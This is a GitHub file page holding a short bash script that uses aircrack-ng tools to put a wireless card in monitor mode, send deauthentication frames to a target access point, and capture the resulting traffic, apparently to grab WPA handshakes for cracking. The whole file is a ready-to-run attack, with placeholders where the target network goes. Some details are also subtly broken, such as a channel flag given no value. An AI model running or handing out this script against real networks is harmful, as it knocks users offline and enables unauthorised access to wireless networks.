Skip to content
Permalink
1f0593bb6a
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
5 lines (5 sloc) 207 Bytes
#!/usr/bin/bash
airmon-ng start wlan1 6
aireplay-ng --deauth 5 -a [Network SSID here] wlan1mon && timeout 75s airodump-ng -c --bssid [Network SSID here] -w packets wlan1mon
airmon-ng stop wlan1mon
reboot